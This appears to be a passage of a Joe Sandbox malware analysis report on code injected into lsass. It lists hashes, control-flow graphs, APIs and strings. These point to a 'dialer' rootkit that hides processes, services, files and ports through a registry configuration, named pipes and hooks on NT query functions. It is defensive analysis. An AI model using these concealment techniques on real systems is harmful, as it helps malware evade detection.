                                                                                • Instruction ID: ff27eb41dcb5b73217d9f66f3d93e9fcb499343be5ad2be27ed4907ae2897191
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: D261123274525587EE68CF25D4887ADF392FB24B9CF548025DA1A07785EB3AEB53CB00

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 344 213bdce2cdc-213bdce2d55 call 213bdcfecc0 347 213bdce3090-213bdce30b3 344->347 348 213bdce2d5b-213bdce2d61 344->348 348->347 349 213bdce2d67-213bdce2d6a 348->349 349->347 350 213bdce2d70-213bdce2d73 349->350 350->347 351 213bdce2d79-213bdce2d89 GetModuleHandleA 350->351 352 213bdce2d9d 351->352 353 213bdce2d8b-213bdce2d9b GetProcAddress 351->353 354 213bdce2da0-213bdce2dbe 352->354 353->354 354->347 356 213bdce2dc4-213bdce2de3 StrCmpNIW 354->356 356->347 357 213bdce2de9-213bdce2ded 356->357 357->347 358 213bdce2df3-213bdce2dfd 357->358 358->347 359 213bdce2e03-213bdce2e0a 358->359 359->347 360 213bdce2e10-213bdce2e23 359->360 361 213bdce2e25-213bdce2e31 360->361 362 213bdce2e33 360->362 363 213bdce2e36-213bdce2e3a 361->363 362->363 364 213bdce2e3c-213bdce2e48 363->364 365 213bdce2e4a 363->365 366 213bdce2e4d-213bdce2e57 364->366 365->366 367 213bdce2f4d-213bdce2f51 366->367 368 213bdce2e5d-213bdce2e60 366->368 371 213bdce3082-213bdce308a 367->371 372 213bdce2f57-213bdce2f5a 367->372 369 213bdce2e72-213bdce2e7c 368->369 370 213bdce2e62-213bdce2e6f call 213bdce1a14 368->370 374 213bdce2eb0-213bdce2eba 369->374 375 213bdce2e7e-213bdce2e8b 369->375 370->369 371->347 371->360 376 213bdce2f6b-213bdce2f75 372->376 377 213bdce2f5c-213bdce2f68 call 213bdce1a14 372->377 382 213bdce2ebc-213bdce2ec9 374->382 383 213bdce2eea-213bdce2eed 374->383 375->374 381 213bdce2e8d-213bdce2e9a 375->381 378 213bdce2f77-213bdce2f84 376->378 379 213bdce2fa5-213bdce2fa8 376->379 377->376 378->379 388 213bdce2f86-213bdce2f93 378->388 389 213bdce2faa-213bdce2fb3 call 213bdce1d28 379->389 390 213bdce2fb5-213bdce2fc2 lstrlenW 379->390 391 213bdce2e9d-213bdce2ea3 381->391 382->383 392 213bdce2ecb-213bdce2ed8 382->392 385 213bdce2eef-213bdce2ef9 call 213bdce1d28 383->385 386 213bdce2efb-213bdce2f08 lstrlenW 383->386 385->386 399 213bdce2f43-213bdce2f48 385->399 394 213bdce2f2b-213bdce2f3d call 213bdce3930 386->394 395 213bdce2f0a-213bdce2f14 386->395 396 213bdce2f96-213bdce2f9c 388->396 389->390 407 213bdce2ffa-213bdce3005 389->407 400 213bdce2fe5-213bdce2fef call 213bdce3930 390->400 401 213bdce2fc4-213bdce2fce 390->401 398 213bdce2ea9-213bdce2eae 391->398 391->399 402 213bdce2edb-213bdce2ee1 392->402 394->399 410 213bdce2ff2-213bdce2ff4 394->410 395->394 405 213bdce2f16-213bdce2f29 call 213bdce1554 395->405 406 213bdce2f9e-213bdce2fa3 396->406 396->407 398->374 398->391 399->410 400->410 401->400 411 213bdce2fd0-213bdce2fe3 call 213bdce1554 401->411 402->399 412 213bdce2ee3-213bdce2ee8 402->412 405->394 405->399 406->379 406->396 414 213bdce307c-213bdce3080 407->414 415 213bdce3007-213bdce300b 407->415 410->371 410->407 411->400 411->407 412->383 412->402 414->371 419 213bdce300d-213bdce3011 415->419 420 213bdce3013-213bdce302d call 213bdce86a0 415->420 419->420 423 213bdce3030-213bdce3033 419->423 420->423 426 213bdce3035-213bdce3053 call 213bdce86a0 423->426 427 213bdce3056-213bdce3059 423->427 426->427 427->414 429 213bdce305b-213bdce3079 call 213bdce86a0 427->429 429->414
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: ca9904828aa5c22bee977df1f79897f42c607b25d1b57698437f8faa860b30b2
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: 5AB192B2218A5883EF64CF25C4487E9A3A6F768B8DF545026EE0957794FF36EB40C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: eafa0bfd2c6caafee150dbefaf866147db6823b9347aedc9e104821d9a0450aa
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: B0315BB2208B849AEB60DF60E8443ED7361F79474CF44442ADA4E47B99EF39C748C714
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 899406dd9d5b6fbe9dbae707097402a3bd2e2a6e0ff52354d21bb90e827dad56
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: DF315E72208F8496DB60CF25E8443DE73A5F79875CF500126EA9D47BA9EF39C7498B00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: b304ae2e26442db500cb89171f9cd10eae45a2c1c1ffb37558ed07a3952ec39e
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: E5E1F372708A809AEB50CF64D4883DD7BB2F355B8CF548126DE4A5BB99EA35C71AC700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 2135414181-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: 922c905eacfc6ff9b5d7e5ee8ee23e6a2f76922591df28c004eccb8142a8d691
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: 75712B76314E5496EF10DF62E8486D923A6F7A4B8CF402122DA4D87728EF3AC758C300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: c05d0bd73bb20f110e136ef88ee1e7915113fa0142f2850efa12ddce9de511b3
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: 8B516072218B4493EB14DF62E5483DA73A2F799B8CF448125DA4947B18EF39D369CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: d021cbab7c8d3db1f98d434a9803d44f83e8160b85b5d63a4cef5ea0ce537124
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: A231C7B1118A4AA2FE04EF64E8597D4A323B77834CF815433A41D4A169FF3A974EC384

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: ede12efc8e376077b0b866396e57bdc42fb7257f1e19bc7fe029267b8d71f0ff
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: F7214136618B4493FB10CB25E4487D9B3A2F399BACF504215EA5906BA8EF3DC349CF00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: f775d0b854ccff875a5a4fe2c3ed9a65cd4689a4e084aa52be3ee5af2899a8c1
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: 99417173218B8497EB60CF51E4487DAB7A2F39978CF008125DB8947B58EF39D265CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: a70e2868a3674efca74706f7a1f8c9029aa822793189d19dcffaae516c3cdb79
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: A2810FB170C78987FE60EB25A8493E92293A77178CF344135D9084B7D6FB3AEB468700

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 460 213bdcb69f0-213bdcb69f6 461 213bdcb6a31-213bdcb6a3b 460->461 462 213bdcb69f8-213bdcb69fb 460->462 463 213bdcb6b58-213bdcb6b6d 461->463 464 213bdcb69fd-213bdcb6a00 462->464 465 213bdcb6a25-213bdcb6a64 call 213bdcb70a0 462->465 466 213bdcb6b7c-213bdcb6b96 call 213bdcb6f34 463->466 467 213bdcb6b6f 463->467 469 213bdcb6a02-213bdcb6a05 464->469 470 213bdcb6a18 __scrt_dllmain_crt_thread_attach 464->470 483 213bdcb6b32 465->483 484 213bdcb6a6a-213bdcb6a7f call 213bdcb6f34 465->484 481 213bdcb6bcf-213bdcb6c00 call 213bdcb7270 466->481 482 213bdcb6b98-213bdcb6bcd call 213bdcb705c call 213bdcb6efc call 213bdcb73f8 call 213bdcb7210 call 213bdcb7234 call 213bdcb708c 466->482 473 213bdcb6b71-213bdcb6b7b 467->473 471 213bdcb6a11-213bdcb6a16 call 213bdcb6fe4 469->471 472 213bdcb6a07-213bdcb6a10 469->472 475 213bdcb6a1d-213bdcb6a24 470->475 471->475 492 213bdcb6c02-213bdcb6c08 481->492 493 213bdcb6c11-213bdcb6c17 481->493 482->473 487 213bdcb6b34-213bdcb6b49 483->487 495 213bdcb6a85-213bdcb6a96 call 213bdcb6fa4 484->495 496 213bdcb6b4a-213bdcb6b57 call 213bdcb7270 484->496 492->493 497 213bdcb6c0a-213bdcb6c0c 492->497 498 213bdcb6c5e-213bdcb6c74 call 213bdcb2858 493->498 499 213bdcb6c19-213bdcb6c23 493->499 510 213bdcb6a98-213bdcb6abc call 213bdcb73bc call 213bdcb6eec call 213bdcb6f18 call 213bdcb90dc 495->510 511 213bdcb6ae7-213bdcb6af1 call 213bdcb7210 495->511 496->463 505 213bdcb6cff-213bdcb6d0c 497->505 517 213bdcb6cac-213bdcb6cae 498->517 518 213bdcb6c76-213bdcb6c78 498->518 506 213bdcb6c2f-213bdcb6c3d call 213bdcc2758 499->506 507 213bdcb6c25-213bdcb6c2d 499->507 513 213bdcb6c43-213bdcb6c58 call 213bdcb69f0 506->513 528 213bdcb6cf5-213bdcb6cfd 506->528 507->513 510->511 563 213bdcb6abe-213bdcb6ac5 __scrt_dllmain_after_initialize_c 510->563 511->483 531 213bdcb6af3-213bdcb6aff call 213bdcb7260 511->531 513->498 513->528 526 213bdcb6cb0-213bdcb6cb3 517->526 527 213bdcb6cb5-213bdcb6cca call 213bdcb69f0 517->527 518->517 525 213bdcb6c7a-213bdcb6c9c call 213bdcb2858 call 213bdcb6b58 518->525 525->517 557 213bdcb6c9e-213bdcb6ca6 call 213bdcc2758 525->557 526->527 526->528 527->528 542 213bdcb6ccc-213bdcb6cd6 527->542 528->505 550 213bdcb6b01-213bdcb6b0b call 213bdcb7178 531->550 551 213bdcb6b25-213bdcb6b30 531->551 547 213bdcb6ce1-213bdcb6cf1 call 213bdcc2758 542->547 548 213bdcb6cd8-213bdcb6cdf 542->548 547->528 548->528 550->551 562 213bdcb6b0d-213bdcb6b1b 550->562 551->487 557->517 562->551 563->511 564 213bdcb6ac7-213bdcb6ae4 call 213bdcb9078 563->564 564->511
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: eab646407fb415bcd271bdd7b8d74e229cdddd17f168040cd44df6bbfbba876a
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 2F81D2317CC24986FE54EB25D4493E966A3E775B8CF184025AE044B7D6FB3BCB868700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: 6d9a40135cc713c70157257fe573e51b07df91e3d11a61b95067af7e8a374051
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: 2131A57121AB54A2EE21DB02A8087D97396F729BACF194635DD2D4B394FF39D7498300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: ae81e54e8e29fef949cdf2b766ead47be9054d0acc44a326ed427ccb5dba9222
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: 8F118631318F4086EB50CB56E8583D972A1F7A9FECF044215EA5D8B798EF79C7488744
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction ID: 67465ba89eb819beb97428597d286ff6ed36852c47c5d97a5a91c13633ff9173
                                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction Fuzzy Hash: 6CD19E76219B8886DE70DB19E49439A77A1F398B8CF100126EACD47BA9DF3DD741CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: f801f377698cdbac55d20d9e27f3ee8d5aa60ea3fe96cb9ba27e623178e67f28
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: 3531A571709F5993EF15CF1698083E963A2FB65B8DF0480349E4847B54FB3AE7A58700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: e110916fc580362842d9f67df415d1488aa95e7e2029b08bdeffe09187ba22a8
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 42015B71308A41A6EB10DB12A45C7E963A2F798FC8F588035CE8947758EE3ECB898300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: a51b4b081aaa3ee95b9914639ca43ab62405056ded959ff562cb45bbcc6af140
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: CE115BB4209B4492EF24DB21E40D7DA67A2FB68B8DF040526D9490B758FF3EC70C8700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction ID: 2aefe0c659b58780a74d809327a6d5341468524f7f9bfca2817369623e4b6a72
                                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction Fuzzy Hash: 26518BB22196488BEF15CB25E44CB9977A6F3A4B8CF518130DA564B788FF76EB41C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: d97ce3111bf8600455a5925fa1c43196ce8e24f725bd580d602b81ce6816eed2
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: E6F08970308F80A2EE10CB53F9081D55212A758FDCF044131DD9A4BB6DEE3DC7898700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: 9710ce36139fc3cf2938eb608b418f4c688838cbd9fe4f143e3d187588616609
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: ECF0F471319B45E6EF58DB50E8883E51362EB6479CF442016D50B89569EE39C78CC714
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: cbad0a52509f52af97276bf66451275c768a30f6d0d5e95c79d101ae717123fa
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: 7702DC7211DB8486DB60CB55F45439ABBA1F3D4788F100125EA8E87BA9EF7DDA54CF00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: ada3f5d83e98fdef4ac76bf815d5529dc191443047ee9fb3c149366cca31c3fd
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: 0281F333618A0489FF90DB6488483ED27A3F364F8CF540226DE0A5B79AFB368749D310
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction ID: 06613ef93601e72356b79dcc7801bdfc1c98213d6687eafd3f2aa6b970ef7109
